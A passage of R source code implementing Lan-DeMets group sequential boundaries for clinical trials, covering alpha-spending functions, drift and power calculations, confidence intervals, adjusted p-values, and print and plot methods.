ld1 <- landem(t,t2,1,iuse[1],asf[[1]],alpha[1],phi[1],ztrun[1])
ld2 <- landem(t,t2,1,iuse[2],asf[[2]],alpha[2],phi[2],ztrun[2])
lbnd <- -ld1$upper.bounds
ubnd <- ld2$upper.bounds
epr <- ld1$exit.pr+ld2$exit.pr
dpr <- ld1$diff.pr+ld2$diff.pr
spend <- c(ld1$spend,ld2$spend)
}
nom.alpha <- 1-pnorm(ubnd)+pnorm(lbnd)
ans <- list(bounds.type=type,spending.type=spend,time=t,time2=t3,alpha=alpha,overall.alpha=sum(alpha),lower.bounds=lbnd,upper.bounds=ubnd,exit.pr=epr,diff.pr=dpr,nom.alpha=nom.alpha)
class(ans) <- "bounds"
return(ans)
}
"alphas" <-
function(iuse,asf,alpha,phi,side,t){
tol <- 10^(-13)
if (iuse==1){
pe <- 2*(1-pnorm(qnorm(1-(alpha/side)/2)/sqrt(t)))
spend <- "O'Brien-Fleming"
}
else if (iuse==2){
pe <- (alpha/side)*log(1+(exp(1)-1)*t)
spend <- "Pocock"
}
else if (iuse==3){
pe <- (alpha/side)*t^phi
spend <- "Power Family: alpha * t^phi"
}
else if (iuse==4){
pe <- (alpha/side)*(1-exp(-phi*t))/(1-exp(-phi)) ### TDC - inserted "-"
spend <- "Hwang-Shih-DeCani Family"
}
else if (iuse==5){
if(missing(alpha)) alpha <- asf(1)
if(any(diff(asf(t))<=0.0000001))
stop("Alpha Spending function must an increasing function.")
if(asf(1)>1 ) stop("Alpha Spending function must be less than or equal to 1.")
spend <- "User-specified spending function"
pe <- (1/side)*asf(t)
}
else stop("Must choose 1, 2, 3, 4, or 5 as spending function.")
pe <- side*pe
pd <- pe-c(0,pe[-length(pe)])
if (sum(as.integer({pd<0.0000001*(-1)}|{pd>1.0000001})) >= 1){
warning("Spending function error")
pd <- min(1,pd)
pd <- max(0,pd)
}
for (j in 1:length(pd)){
if (pd[j] < tol){
warning("Type I error spent too small for analysis #",j,"\n",
"Zero used as approximation for ",pd[j])
pd[j] <- 0
}
}
ans <- list(pe=pe,pd=pd,spend=spend)
return(ans)
}
"drift" <-
function(t,za=NULL,zb=NULL,t2=x,pow=NULL,drft=NULL,conf=NULL,pval=NULL,pvaltime=NULL,zval=zb[length(zb)]){
if (inherits(t, "bounds")){
za <- t$lower.bounds
zb <- t$upper.bounds
t2 <- t$time2
t <- t$time
}
else {
if(length(t)==1){
if(abs(t - round(t)) < .0000001 & t > 1) t <- 1:t/t
else if(t>1) stop("t must be an integer or in (0,1]")}
if(missing(t2)) t2 <- t
else if (length(t) != length(t2)){
stop("Original and second time scales must be vectors of the same length.")
}
if ({min(t) < 0.0000001}|{max(t) > 1.0000001}|{min(t2) < 0.0000001}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}
if ({min(t) <= 0}|{max(t) > 1}|{min(t2) <= 0}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}}
if (sum({t-c(0,t[-length(t)]) <= 0}|{t2-c(0,t[-length(t2)]) <= 0}) > 0){
stop("Analysis times must be ordered from smallest to largest.")
}
if ({is.null(za)}&{!is.null(zb)})
za <- -zb
t3 <- t2
t2 <- t2/max(t2)
if (!is.null(pow)+!is.null(drft)+!is.null(conf)+!is.null(pval)!=1){
stop("Only one of power, drift, confidence level, or p-value ordering can be given.")
}
else if (is.null(pow)&is.null(drft)&is.null(conf)&is.null(pval)){
drft=0
}
drift1 <- NULL
if (!is.null(pow)){
if ({pow <= 0}|{pow > 1}){
stop("Power must be in (0,1].")
}
type <- 1
drift1 <- adrift(t2,za,zb,pow)
}
if (!is.null(drft)){
type <- 2
drift1 <- drft
}
if (!is.null(drift1)){
gl <- glan(t2,za,zb,drift1)
if (!is.null(drft)) pow <- gl$pr
ans <- list(type=type,time=t,time2=t3,lower.bounds=za,upper.bounds=zb,power=pow,
drift=drift1,lower.probs=gl$qneg,upper.probs=gl$qpos,
exit.probs=gl$qneg+gl$qpos,cum.exit=cumsum(gl$qneg+gl$qpos))
}
if (!is.null(conf)){
if (zval < 0){
stop("Confidence interval is only for nonnegative final Z value.")
}
conf.limit <- ci(conf,zval,t2,za,zb)
ans <- list(type=3,time=t,time2=t3,lower.bounds=za,upper.bounds=zb,
conf.level=conf,final.zvalue=zval,conf.interval=conf.limit)
}
if (!is.null(pval)){
if (zval < 0){
stop("P-value is only for nonnegative Z value.")
}
p.value <- adj.p(pval,pvaltime,zval,t2,zb)
ans <- list(type=4,time=t,time2=t3,lower.bounds=za,upper.bounds=zb,
conf.level=conf,analysis.time=pvaltime,final.zvalue=zval,p.ordering=pval,p.value=p.value)
}
class(ans) <- "drift"
return(ans)
}
"adj.p" <-
function(pval,pvaltime,zval,t,up.bound){
if (!pval%in%c("SW","LR")){
stop("Possible p-value orderings are stagewise (SW) and likelihood ratio (LR).")
}
if (is.null(pvaltime)){
stop("P-value time must correspond to one of the analysis times.")
}
if (!is.null(pvaltime)){
if (pvaltime>length(up.bound)){
stop("P-value time must correspond to one of the analysis times.")
}
}
if (pval=="SW"){
p.drift <- drift(zb=c(up.bound[1:(pvaltime-1)],zval),za=rep(-10,3),t=t[1:pvaltime],drft=0)
p.value <- summary(p.drift)$bounds1[,'Cum exit pr.'][pvaltime]
}
else{
lr.exit <- rep(0,length(up.bound))
maxval1 <- max(up.bound[1],zval)
lr1 <- drift(zb=maxval1,za=-10,t=t[1],drft=0)
lr.exit[1] <- lr1$exit[1]
for (j in 1:(length(up.bound)-1)){
maxval <- max(up.bound[j+1],zval)
lr <- drift(zb=c(up.bound[1:j],maxval),za=rep(-10,j+1),t=t[1:(j+1)],drft=0)
lr.exit[j+1] <- lr$exit[j+1]
}
p.value <- sum(lr.exit)
}
return(p.value)
}
"adrift" <-
function(t,za,zb,pow){
dr <- (zb[length(t)]+qnorm(pow))/sqrt(t[length(t)])
drft <- bisect(t,za,zb,pow,dr)
return(drft)
}
"bisect" <-
function(t,za,zb,target,drft=0,upper=FALSE){
tol <- 0.000001
dl <- 0.25
gotlo <- 0
gothi <- 0
prev <- 0
pr <- 0
while ({abs(pr-target) > tol}&{abs(drft-prev) > tol/10}){
glan.out <- glan(t,za,zb,drft)
if (upper){
pr <- sum(glan.out$qpos)
}
if (!upper){
pr <- glan.out$pr
}
if (pr > target+tol){
hi <- drft
drft <- drft-dl
gothi <- 1
}
if (pr < target-tol){
lo <- drft
drft <- drft+dl
gotlo <- 1
}
if ({gothi==1}&{gotlo==1}){
prev <- drft
drft <- (lo+hi)/2
}
}
if ({abs(drft-prev) <= tol/10}&{abs(pr-target) > tol}){
warning("Convergence problem")
}
return(drft)
}
"bsearch" <-
function(last,nints,i,pd,stdv,ya,yb){
tol <- 10^(-7)
del <- 10
uppr <- yb[i-1]
q <- qp(uppr,last,nints[i-1],ya[i-1],yb[i-1],stdv)
while (abs(q-pd) > tol){
del <- del/10
incr <- 2*as.integer(q > pd+tol)-1
j <- 1
while (j <= 50){
uppr <- uppr+incr*del
q <- qp(uppr,last,nints[i-1],ya[i-1],yb[i-1],stdv)
if ({abs(q-pd) > tol}&{j==50}){
stop("Error in search: not converging")
}
else if ({{incr==1}&{q <= pd+tol}}|{{incr==-1}&{q >= pd-tol}}){
j <- 50
}
j <- j+1
}
}
ybval <- uppr
return(ybval)
}
"ci" <-
function(conf,value,t,za,zb){
zb[length(t)] <- value
zcrit <- qnorm(1-(1-conf)/2)
limit <- (value+c(-1,1)*zcrit)/sqrt(t[length(t)])
target <- c(0,1)*conf+(1-conf)/2
lim1 <- bisect(t,za,zb,target[1],limit[1],upper=TRUE)
lim2 <- bisect(t,za,zb,target[2],limit[2],upper=TRUE)
lim <- list(lower.limit=lim1,upper.limit=lim2)
return(lim)
}
"commonbounds" <-
function(looks,t=(1:looks)/looks,t2=t,iuse="OF",alpha=0.05,sides=2){
if ({!is.null(looks)}&{!is.numeric(looks)}){
stop("'looks' must be an integer.")
}
if (sum(t==(1:length(t))/length(t))<length(t)){
warning("Time points are not equally spaced.")
}
if (length(t) != length(t2)){
stop("Original and second time scales must be vectors of the same length.")
}
if ({min(t) < 0.0000001}|{max(t) > 1.0000001}|{min(t2) < 0.0000001}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}
t3 <- t2
t2 <- t2/max(t2)
if ({sum({t-c(0,t[-length(t)]) < 0.0000001}) > 0}|{sum({t2-c(0,t2[-length(t)]) < 0.0000001}) > 0}){
stop("Analysis times must be ordered from smallest to largest.")
}
if (sum(!iuse%in%c("PK","OF","HP"))>0){
stop("Boundary type (iuse) must be \"PK\" or \"OF\".")
}
if ({sum(alpha < 0.0000001) > 0}|{sum(alpha) > 1.0000001}){
stop("Each component of alpha must be positive and their sum cannot exceed 1.")
}
if (length(iuse) != length(alpha)){
stop("For two-sided bounds, the lengths of the iuse and alpha vectors must both be 2.")
}
if (!sides%in%c(1,2)){
stop("Sides must be 1 or 2.")
}
if ({length(alpha)==1}|{{length(alpha)==2}&{alpha[1]==alpha[2]}&{iuse[1]==iuse[2]}}){
if ({length(alpha)==1}&{sides==2}){
alph <- alpha/2
}
else{
alph <- alpha
}
if (iuse[1]=="PK"){
root <- uniroot(search.glan.pocock,c(1.5,2.3+0.05*looks),k=looks,alpha=alph)$root
ubnd <- rep(root,looks)
spend <- "Pocock"
}
if (iuse[1]=="OF"){
root <- uniroot(search.glan.obrien,c(1.5,2+0.05*looks),k=looks,alpha=alph)$root
ubnd <- root/sqrt((1:looks)/looks)
spend <- "O'Brien-Fleming"
}
if ({length(alpha)==1}&{sides==1}){
type <- 4
lbnd <- rep(-8,length(ubnd))
}
if ({length(alpha)==2}|{{length(alpha)==1}&{sides==2}}){
type <- 5
lbnd <- -1*ubnd
}
drift.for.probs <- drift(za=lbnd,zb=ubnd,t=t2,drft=0)
dpr <- drift.for.probs$upper.probs
epr <- cumsum(dpr)
}
else{
type <- 6
spend <- c("","")
if (iuse[1]=="PK"){
root <- uniroot(search.glan.pocock,c(1.5,2.3+0.05*looks),k=looks,alpha=alpha[1])$root
lbnd <- -1*rep(root,looks)
spend[1] <- "Pocock"
}
if (iuse[1]=="OF"){
root <- uniroot(search.glan.obrien,c(1.5,2+0.05*looks),k=looks,alpha=alpha[1])$root
lbnd <- -1*root/sqrt((1:looks)/looks)
spend[1] <- "O'Brien-Fleming"
}
if (iuse[2]=="PK"){
root <- uniroot(search.glan.pocock,c(1.5,2.3+0.05*looks),k=looks,alpha=alpha[2])$root
ubnd <- rep(root,looks)
spend[2] <- "Pocock"
}
if (iuse[2]=="OF"){
root <- uniroot(search.glan.obrien,c(1.5,2+0.05*looks),k=looks,alpha=alpha[2])$root
ubnd <- root/sqrt((1:looks)/looks)
spend[2] <- "O'Brien-Fleming"
}
drift.for.probs <- drift(za=lbnd,zb=ubnd,t=t2,drft=0)
dpr <- drift.for.probs$upper.probs+drift.for.probs$lower.probs
epr <- cumsum(dpr)
}
nom.alpha <- 1-pnorm(ubnd)+pnorm(lbnd)
ans <- list(bounds.type=type,spending.type=spend,time=t,time2=t3,alpha=alpha,overall.alpha=sum(alpha),lower.bounds=lbnd,upper.bounds=ubnd,exit.pr=epr,diff.pr=dpr,nom.alpha=nom.alpha)
class(ans) <- "bounds"
return(ans)
}
"cprob" <-
function(last,nints,ya,yb,i,stdv){
hlast <- (yb[i-1]-ya[i-1])/nints[i-1]
grid <- seq(ya[i-1],yb[i-1],length=nints[i-1]+1)
pupr <- (1-pnorm(yb[i],mean=grid,sd=stdv))*last
plow <- pnorm(ya[i],mean=grid,sd=stdv)*last
tqpos <- 0.5*hlast*(2*sum(pupr)-pupr[1]-pupr[length(pupr)]) # This is "trap"
tqneg <- 0.5*hlast*(2*sum(plow)-plow[1]-plow[length(plow)]) # This is "trap"
ans <- list(qpos=tqpos,qneg=tqneg)
return(ans)
}
"fcab" <-
function(last,nints,yam1,h,x,stdv){
f <- last*dnorm(h*c(0:nints)+yam1,mean=matrix(rep(x,nints+1),nints+1,length(x),byrow=TRUE),sd=stdv)
area <- 0.5*h*(2*colSums(f)-f[1,]-f[nrow(f),]) # This is "trap"
return(area)
}
"glan" <-
function(t,za,zb,drft){
h <- 0.05
stdv <- sqrt(t-c(0,t[-length(t)])) # These are subroutine "sd"
sdproc <- sqrt(t) # These are subroutine "sd"
yb <- zb*sdproc-drft*t
ya <- za*sdproc-drft*t
nints <- ceiling((yb-ya)/(h*stdv))
qneg1 <- pnorm(za[1],mean=drft*t[1]/stdv[1])
qpos1 <- 1-pnorm(zb[1],mean=drft*t[1]/stdv[1])
cp <- matrix(0,length(t),2)
cp[1,] <- c(qpos1,qneg1)
if (length(t) >= 2){
grid <- seq(ya[1],yb[1],length=nints[1]+1) # These are "first"
last <- dnorm(grid,mean=0,sd=stdv[1]) # These are "first"
for (i in 2:length(t)){
cpr <- cprob(last,nints,ya,yb,i,stdv[i])
cp[i,] <- c(cpr[[1]],cpr[[2]])
if (i < length(t)){
hlast <- (yb[i-1]-ya[i-1])/nints[i-1] # These are "other"
x <- seq(ya[i],yb[i],length=nints[i]+1) # These are "other"
last <- fcab(last,nints[i-1],ya[i-1],hlast,x,stdv[i]) # These are "other"
}
}
}
pr <- sum(cp)
ans <- list(pr=pr,qpos=cp[,1],qneg=cp[,2])
return(ans)
}
"landem" <-
function(t,t2,side,iuse,asf,alpha,phi,ztrun){
h <- 0.05
zninf <- -8
tol <- 0.0000001
stdv <- sqrt(t2-c(0,t2[-length(t2)])) # These are subroutine "sd"
sdproc <- sqrt(t2) # These are subroutine "sd"
alph <- alphas(iuse,asf,alpha,phi,side,t)
za <- zb <- ya <- yb <- nints <- rep(0,length(t))
pd <- alph$pd
pe <- alph$pe
if (pd[1]==0){
zb[1] <- -zninf
if (zb[1] > ztrun){
zb[1] <- ztrun
pd[1] <- side*(1-pnorm(zb[1]))
pe[1] <- pd[1]
if (length(t) > 1) pd[2] <- pe[2]-pe[1]
}
yb[1] <- zb[1]*stdv[1]
}
else if (pd[1] < 1){
zb[1] <- qnorm(1-pd[1]/side)
if (zb[1] > ztrun){
zb[1] <- ztrun
pd[1] <- side*(1-pnorm(zb[1]))
pe[1] <- pd[1]
if (length(t) > 1) pd[2] <- pe[2]-pe[1]
}
yb[1] <- zb[1]*stdv[1]
}
if (side==1){
za[1] <- zninf
ya[1] <- za[1]*stdv[1]
}
else if (side != 1){
za[1] <- -zb[1]
ya[1] <- -yb[1]
}
nints[1] <- ceiling((yb[1]-ya[1])/(h*stdv[1]))
if (length(t) >= 2){
grid <- seq(ya[1],yb[1],length=nints[1]+1) # These are "first"
last <- dnorm(grid,mean=0,sd=stdv[1]) # These are "first"
for (i in 2:length(t)){
if ({pd[i] < 0}|{pd[i] > 1}){
warning("Possible error in spending function. May be due to truncation.")
pd[i] <- min(1,pd[i])
pd[i] <- max(0,pd[i])
}
if (pd[i] < tol){
zb[i] <- -zninf
if (zb[i] > ztrun){
zb[i] <- ztrun
pd[i] <- side*qp(zb[i]*sdproc[i],last,nints[i-1],ya[i-1],yb[i-1],stdv[i])
pe[i] <- pd[i]+pe[i-1]
if (i < length(t)) pd[i+1] <- pe[i+1]-pe[i]
}
yb[i] <- zb[i]*sdproc[i]
}
else if (pd[i]==1) zb[i] <- yb[i] <- 0
else if ({pd[i] >= tol}&{pd[i] < 1}){
yb[i] <- bsearch(last,nints,i,pd[i]/side,stdv[i],ya,yb)
zb[i] <- yb[i]/sdproc[i]
if (zb[i] > ztrun){
zb[i] <- ztrun
pd[i] <- side*qp(zb[i]*sdproc[i],last,nints[i-1],ya[i-1],yb[i-1],stdv[i])
pe[i] <- pd[i]+pe[i-1]
if (i < length(t)){
pd[i+1] <- pe[i+1]-pe[i]
}
}
yb[i] <- zb[i]*sdproc[i]
}
if (side==1){
ya[i] <- zninf*sdproc[i]
za[i] <- zninf
}
else if (side==2){
ya[i] <- -yb[i]
za[i] <- -zb[i]
}
nints[i] <- ceiling((yb[i]-ya[i])/(h*stdv[i]))
if (i < length(t)){
hlast <- (yb[i-1]-ya[i-1])/nints[i-1] # These are "other"
x <- seq(ya[i],yb[i],length=nints[i]+1) # These are "other"
last <- fcab(last,nints[i-1],ya[i-1],hlast,x,stdv[i]) # These are "other"
}
}
}
ans <- list(lower.bounds=za,upper.bounds=zb,exit.pr=pe,diff.pr=pd,spend=alph$spend)
return(ans)
}
"plot.bounds" <-
function(x, scale = "z", main = NULL, xlab = NULL, ylab = NULL,
xlim, ylim, las=1, pch=19, type="o",add=F,...){
if (!((inherits(x, "bounds"))|(inherits(x, "drift"))))
stop("'x' must inherit from class \"bounds\" or \"drift\"")
if (!scale%in%c("z","b"))
stop("Scale must be either \"z\" (z-value) or \"b\" (b-value)")
if (is.null(main))
main <- "Sequential boundaries using the Lan-DeMets method"
if (is.null(xlab))
xlab <- "Time"
if (is.null(ylab)){
if (scale=="z"){
ylab <- "Z"
}
else{
ylab <- "B"
}
}
z <- c(0,x$time)
r <- rep(0,length(z))
if(missing(xlim)) xlim <- c(0,z[length(z)])
if ({inherits(x, "bounds")}&{x$bounds.type==1}){
u <- c(NA,x$upper.bounds)
if (scale=="b"){
u <- u*sqrt(z)
}
if(missing(ylim)) ylim <- c(0,max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim,
ylim=ylim, las=las, pch=pch, type=type,...)
points(z,r, ...)
lines(z,r,...)
}
else{
u <- c(NA,x$upper.bounds)
l <- c(NA,x$lower.bounds)
if (scale=="b"){
u <- u*sqrt(z)
l <- l*sqrt(z)
}
if(missing(ylim)) ylim <- c(min(l,na.rm=T),max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim,
ylim=ylim, las=las, pch=pch, type=type,...)
points(z,l,pch=pch, ...)
lines(z,l,...)
points(z,r, ...)
lines(z,r,...)
}
}
"plot.drift" <-
function(x, scale = "z", main = NULL, xlab = NULL, ylab = NULL,
xlim, ylim, las=1, pch=19, type="o",add=F, ...){
if (!((inherits(x, "bounds"))|(inherits(x, "drift"))))
stop("'x' must inherit from class \"bounds\" or \"drift\"")
if (!scale%in%c("z","b"))
stop("Scale must be either \"z\" (z-value) or \"b\" (b-value)")
if (is.null(main))
main <- "Sequential boundaries using the Lan-DeMets method"
if (is.null(xlab))
xlab <- "Time"
if (is.null(ylab)){
if (scale=="z"){
ylab <- "Z"
}
else{
ylab <- "B"
}
}
z <- c(0,x$time)
r <- rep(0,length(z))
if(missing(xlim)) xlim <- c(0,z[length(z)])
if ({inherits(x, "bounds")}&&{x$bounds.type==1}){ ### TDC added extra "&"
u <- c(NA,x$upper.bounds)
if (scale=="b"){
u <- u*sqrt(z)
}
if(missing(ylim)) ylim <- c(0,max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim, ylim=ylim,
las=las, pch=pch, type=type,...)
points(z,r, ...)
lines(z,r,...)
}
else{
u <- c(NA,x$upper.bounds)
l <- c(NA,x$lower.bounds)
if (scale=="b"){
u <- u*sqrt(z)
l <- l*sqrt(z)
}
if(missing(ylim)) ylim <- c(min(l,na.rm=T),max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim, ylim=ylim, las=las, pch=pch,
type=type,...)
points(z,l,pch=19, ...)
lines(z,l,...)
points(z,r, ...)
lines(z,r,...)
}
}
"print.bounds" <-
function(object, ...)
{
z <- object
if (!inherits(z, "bounds"))
stop("'object' must inherit from class \"bounds\"")
p <- length(z$time)
if (identical(z$time,z$time2)){
b <- matrix(NA, p, 3)
b[,1:3] <- c(z$time, z$lower.bounds, z$upper.bounds)
colnames(b) <- c("Time", "Lower", "Upper")
}
else{
b <- matrix(NA, p, 4)
b[,1:4] <- c(z$time, z$time2, z$lower.bounds, z$upper.bounds)
colnames(b) <- c("Time", "Time 2", "Lower", "Upper")
}
ans <- list()
ans$type <- z$bounds.type
ans$spending <- z$spending.type
ans$n <- p
ans$alpha <- z$alpha
ans$oalpha <- z$overall.alpha
ans$bounds <- b
rownames(ans$bounds) <- rownames(ans$bounds, do.NULL = FALSE, prefix = "")
if (ans$type%in%(1:3)){
cat("\nLan-DeMets bounds for a given spending function \n", "\nn = ", ans$n, "\nOverall alpha: ", ans$oalpha, "\n")
}
if (ans$type%in%(4:6)){
cat("\nGroup sequential boundaries \n", "\nn = ", ans$n, "\nOverall alpha: ", ans$oalpha, "\n")
}
if (ans$type%in%c(1,4)){
if (ans$type==1){
cat("\nType: One-Sided Bounds", "\nalpha: ", ans$alpha, "\nSpending function:", ans$spending, "\n", "\nBoundaries:\n")
}
if (ans$type==4){
cat("\nType: One-Sided Bounds", "\nalpha: ", ans$alpha, "\nBoundary type (non-alpha-spending):", ans$spending, "\n", "\nBoundaries:\n")
}
if (ncol(ans$bounds)==3)
print.default(ans$bounds[,-2], digits = 5, quote = FALSE, print.gap = 2, ...)
else
print.default(ans$bounds[,-3], digits = 5, quote = FALSE, print.gap = 2, ...)
cat("\n")
}
else{
if (ans$type==2){
if (length(ans$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nUpper alpha: ", ans$alpha[2], "\nSpending function: ", ans$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha/2, "\nUpper alpha: ", ans$alpha/2, "\nSpending function: ", ans$spending, "\n")
}
}
if (ans$type==5){
if (length(ans$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nUpper alpha: ", ans$alpha[1], "\nBoundary type (non-alpha-spending): ", ans$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha/2, "\nUpper alpha: ", ans$alpha/2, "\nBoundary type (non-alpha-spending): ", ans$spending, "\n")
}
}
if (ans$type==3){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nSpending function for the lower boundary: ", ans$spending[1], "\nUpper alpha: ", ans$alpha[2], "\nSpending function for the upper boundary: ", ans$spending[2], "\n")
}
if (ans$type==6){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nType of (non-alpha-spending) lower boundary: ", ans$spending[1], "\nUpper alpha: ", ans$alpha[2], "\nType of (non-alpha-spending) upper boundary: ", ans$spending[2], "\n")
}
cat("\nBoundaries:\n")
print.default(ans$bounds, quote = FALSE, print.gap = 2, ...)
cat("\n")
}
}
"print.drift" <-
function(x, digit = 5, ...)
{
z <- x
if (!inherits(z, "drift"))
stop("'x' must inherit from class \"drift\"")
ans <- list()
ans$type <- z$type
ans$n <- length(z$time)
if ((ans$type==1)|(ans$type==2)){
ans$power <- z$power
ans$drift <- z$drift
if (identical(z$time,z$time2)){
b <- matrix(NA, ans$n, 3)
b[,1:3] <- c(z$time, z$lower.probs, z$upper.probs)
colnames(b) <- c("Time", "Lower probs", "Upper probs")
ans$bounds1 <- b
}
else{
b <- matrix(NA, ans$n, 4)
b[,1:4] <- c(z$time, z$time2, z$lower.probs, z$upper.probs)
colnames(b) <- c("Time", "Time 2", "Lower probs", "Upper probs")
ans$bounds1 <- b
}
}
if (ans$type==3){
ans$level <- z$conf.level
ans$fzvalue <- z$final.zvalue
ans$interval <- z$conf.interval
}
if (ans$type==3){
ans$level <- z$conf.level
ans$fzvalue <- z$final.zvalue
ans$interval <- z$conf.interval
}
if (ans$type==4){
if (z$p.ordering=="SW"){
ans$p.ordering <- "Stage-wise"
}
if (z$p.ordering=="LR"){
ans$p.ordering <- "Likelihood ratio "
}
ans$fzvalue <- z$final.zvalue
ans$analysis.time <- z$analysis.time
ans$p.value <- z$p.value
}
if (identical(z$time,z$time2)){
ans$bounds <- matrix(c(z$time, z$lower.bounds, z$upper.bounds), ncol=3, dimnames = list(NULL,c("Time", "Lower", "Upper")))
}
else{
ans$bounds <- matrix(c(z$time, z$time2, z$lower.bounds, z$upper.bounds), ncol=4, dimnames = list(NULL,c("Time", "Time 2", "Lower", "Upper")))
}
rownames(ans$bounds) <- rownames(ans$bounds, do.NULL = FALSE, prefix = "")
cat("\nLan-DeMets method for group sequential boundaries \n", "\nn = ", ans$n, "\n")
cat("\nBoundaries: \n")
if ((ans$type==1)|(ans$type==2)){
rownames(ans$bounds1) <- rownames(ans$bounds1, do.NULL = FALSE, prefix = "")
print.default(cbind(ans$bounds,ans$bounds1[,-1]), quote = FALSE, print.gap = 2, ...)
cat("\nPower : ", ans$power, "\n","\nDrift: ", ans$drift, "\n\n")
}
if (ans$type==3){
low <- ans$interval$lower.limit
up <- ans$interval$upper.limit
cat("\nConfidence interval at the end of the trial: \n", "\nConfidence level: ", ans$level, "\nLast Z value: ", ans$fzvalue, "\n", 100*ans$level, "% confidence interval: (", low, ",", up, ")\n")
}
if (ans$type==4){
cat("\nAdjusted p-value: \n", "\nOrdering method: ", ans$p.ordering, "\nLook: ", ans$analysis.time, "\nZ value observed at that time: ", ans$fzvalue, "\n", "P-value: ", ans$p.value, "\n")
}
}
"print.summary.bounds" <-
function(x, digit = 5, ...)
{
z <- x
if (!inherits(z, "summary.bounds"))
stop("'x' must inherit from class \"summary.bounds\"")
rownames(z$bounds) <- rownames(z$bounds, do.NULL = FALSE, prefix = "")
if (z$type%in%(1:3)){
cat("\nLan-DeMets bounds for a given spending function \n", "\nn = ", z$n, "\nOverall alpha: ", z$oalpha, "\n")
}
if (z$type%in%(4:6)){
cat("\nGroup sequential boundaries \n", "\nn = ", z$n, "\nOverall alpha: ", z$oalpha, "\n")
}
if (z$type%in%c(1,4)){
if (z$type==1){
cat("\nType: One-Sided Bounds", "\nalpha: ", z$alpha, "\nSpending function:", z$spending, "\n", "\nBoundaries:\n")
}
if (z$type==4){
cat("\nType: One-Sided Bounds", "\nalpha: ", z$alpha, "\nBoundary type (non-alpha-spending):", z$spending, "\n", "\nBoundaries:\n")
}
if (ncol(z$bounds)==6)
print.default(z$bounds[,-2], digits = 5, quote = FALSE, print.gap = 2)
else
print.default(z$bounds[,-3], digits = 5, quote = FALSE, print.gap = 2)
}
else{
if (z$type==2){
if (length(z$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nUpper alpha: ", z$alpha[1], "\nSpending function: ", z$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha/2, "\nUpper alpha: ", z$alpha/2, "\nSpending function: ", z$spending, "\n")
}
}
if (z$type==5){
if (length(z$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nUpper alpha: ", z$alpha[1], "\nBoundary type (non-alpha-spending): ", z$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha/2, "\nUpper alpha: ", z$alpha/2, "\nBoundary type (non-alpha-spending): ", z$spending, "\n")
}
}
if (z$type==3){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nSpending function for the lower boundary: ", z$spending[1], "\nUpper alpha: ", z$alpha[2], "\nSpending function for the upper boundary: ", z$spending[2], "\n")
}
if (z$type==6){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nType of (non-alpha-spending) lower boundary: ", z$spending[1], "\nUpper alpha: ", z$alpha[2], "\nType of (non-alpha-spending) upper boundary: ", z$spending[2], "\n")
}
cat("\nBoundaries:\n")
print.default(z$bounds, digits = digit, quote = FALSE, print.gap = 2)
}
}
"print.summary.drift" <-
function(x, digit = 5, ...)
{
z <- x
if (!inherits(z, "summary.drift"))
stop("'x' must inherit from class \"summary.drift\"")
rownames(z$bounds) <- rownames(z$bounds, do.NULL = FALSE, prefix = "")
cat("\nLan-DeMets method for group sequential boundaries \n", "\nn = ", z$n, "\n")
cat("\nBoundaries: \n")
print.default(z$bounds, digits = digit, quote = FALSE, print.gap = 2)
if ((z$type==1)|(z$type==2)){
cat("\nPower : ", z$power, "\n","\nDrift: ", z$drift, "\n", "\n")
rownames(z$bounds1) <- rownames(z$bounds1, do.NULL = FALSE, prefix = "")
print.default(z$bounds1, digits = digit, quote = FALSE, print.gap = 2)
}
if (z$type==3){
low <- z$interval$lower.limit
up <- z$interval$upper.limit
cat("\nConfidence interval at the end of the trial: \n", "\nConfidence level: ", z$level, "\nLast Z value: ", z$fzvalue, "\n", 100*z$level, "% confidence interval: (", low, ",", up, ")\n")
}
if (z$type==4){
cat("\nAdjusted p-value: \n", "\nOrdering method: ", z$p.ordering, "\nLook: ", z$analysis.time, "\nZ value observed at that time: ", z$fzvalue, "\n", "P-value: ", z$p.value, "\n")
}
}
"qp" <-
function(xq,last,nints,yam1,ybm1,stdv){
hlast <- (ybm1-yam1)/nints
grid <- seq(yam1,ybm1,length=nints+1)
fun <- last*pnorm(grid,mean=xq,sd=stdv)
qp <- 0.5*hlast*(2*sum(fun)-fun[1]-fun[length(fun)]) # This is "trap"
return(qp)
}
"search.glan.obrien" <-
function(k,c,alpha){
return(glan((1:k)/k,rep(-8,k),c/sqrt((1:k)/k),0)$pr-alpha)
}
"search.glan.pocock" <-
function(k,c,alpha){
return(glan((1:k)/k,rep(-8,k),rep(c,k),0)$pr-alpha)
}
"summary.bounds" <-
function (object, digits=5, ...)
{
z <- object
if (!inherits(z, "bounds"))
stop("'object' must inherit from class \"bounds\"")
p <- length(z$time)
if (identical(z$time,z$time2)){
b <- matrix(NA, p, 6)
